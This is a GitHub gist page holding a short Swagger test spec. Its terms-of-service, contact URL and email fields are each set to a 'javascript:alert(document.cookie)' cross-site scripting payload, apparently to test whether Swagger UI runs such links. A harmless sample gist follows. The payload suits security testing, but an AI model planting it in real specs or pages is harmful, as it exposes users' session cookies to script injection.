Skip to content

Instantly share code, notes, and snippets.

View ashishmgupta's full-sized avatar

Ashish Gupta ashishmgupta

View GitHub Profile
@ashishmgupta
ashishmgupta / swaggertest
Last active February 10, 2023 15:08
swaggertest
swagger: "2.0",
info:
title: "Swagger Test App",
description: "Click contact us"
termsOfService: "javascript:alert(document.cookie)"
contact:
name: "API Support",
url: "javascript:alert(document.cookie)",
email: "javascript:alert(document.cookie)"
version: "2.0.1"
@ashishmgupta
ashishmgupta / 0_reuse_code.js
Created February 26, 2017 21:37
Here are some things you can do with Gists in GistBox.
// Use Gists to store code you would like to remember later on
console.log(window); // log the "window" object to the console